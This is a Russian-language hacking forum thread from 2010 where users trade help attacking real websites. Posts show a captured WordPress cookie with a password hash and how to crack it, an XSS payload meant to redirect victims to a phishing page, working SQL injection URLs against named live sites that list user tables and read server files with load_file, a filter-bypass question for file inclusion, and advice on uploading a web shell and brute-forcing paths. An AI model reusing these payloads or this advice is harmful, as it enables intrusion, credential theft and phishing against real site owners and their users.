05.03.2010, 19:22
|
|
Участник форума
Регистрация: 30.09.2009
Сообщений: 148
С нами:
8743576
Репутация:
241
|
|
есть строчка такого рода:
Код:
wordpress_test_cookie=WP+Cookie+check;%20wordpressuser_4660020b7a87d7619827cd8098d2d654=Spider;%20wordpresspass_4660020b7a87d7619827cd8098d2d654=febc22cb6c4923d9271a857fc9ea2f7d
как отсюда выдернуть кукисы или мд5 хеш пароля?мб онлайн дешифратор какой-то? |
|
|
05.03.2010, 23:39
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
Сообщение от total90
есть строчка такого рода:
Код:
wordpress_test_cookie=WP+Cookie+check;%20wordpressuser_4660020b7a87d7619827cd8098d2d654=Spider;%20wordpresspass_4660020b7a87d7619827cd8098d2d654=febc22cb6c4923d9271a857fc9ea2f7d
как отсюда выдернуть кукисы или мд5 хеш пароля?мб онлайн дешифратор какой-то? судя по всему куки от wp <2.5, там пароль хранится в wordpresspass алгоритмом md5(md5())
|
|
|
|
06.03.2010, 06:19
|
|
Новичок
Регистрация: 25.07.2009
Сообщений: 10
С нами:
8840513
Репутация:
0
|
|
У меня имееться xss. Я сделал чтобы была автоматическая переадресация на мой фейк таким образом:
Код HTML:
style=background:url('//') onerror=document.write
Но это работает только в опере
Для ie & firefox я сделал чтобы при наведении на текст переадресовывало на фейк:
Код HTML:
onmouseover=document.write
Как сделать чтоб переадресация была автоматически в ie & firefox? |
|
|
|
05.03.2010, 19:24
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,group_concat%28column_name% 29,3%20from%20information_schema.columns%20where%2 0table_name=0x75736572--
выдает id,name,email,pass,session_id,session_date,nick
Нашел Sql
Но при этом когда пишу http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,2,3%20from%20user-- Выдет пустую страницу
В чем может быть косяк?
|
|
|
|
05.03.2010, 19:52
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от Assembler
http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,group_concat%28column_name% 29,3%20from%20information_schema.columns%20where%2 0table_name=0x75736572--
выдает id,name,email,pass,session_id,session_date,nick
Нашел Sql
Но при этом когда пишу http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,2,3%20from%20user-- Выдет пустую страницу
В чем может быть косяк?
http://www.sampo.tv/tele.php?id=1-1%20union%20select%201,count(*),3+from+user
Таблица пустая
|
|
|
|
05.03.2010, 20:41
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Всем привет
можно ли это как нибудь обойти?
PHP код:
$kat = htmlspecialchars($kat);
$kat = str_replace('.','',$kat);
$kat = str_replace('/','',$kat);
if ($_GET[file])
{
file("$kat/$file1");
}
 |
|
|
|
05.03.2010, 20:48
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,fi le_priv,3,4 ,5,6,7,8,9,10,11,12 +from+mysql.user
pojalusta pmoqite kak mojno zalivat shell ??
|
|
|
|
05.03.2010, 20:57
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('c:/boot.ini'),3,4,5,6,7,8,9,10,11,12+from+mysql.user
искать абсолютные пути, брутить |
|
|
|
05.03.2010, 21:00
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
Pashkela , izvini a kak i qde brutit ??
kak moqu uznat drugie puti ??
|
|
|
|
05.03.2010, 22:14
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
просто брутить, известными программами или своим скриптом *тулза умеет, только для винды там словарь говеный*
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1956617){kind=avatar}
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1956032){kind=avatar}
Похожие темы
Комбинированный вид
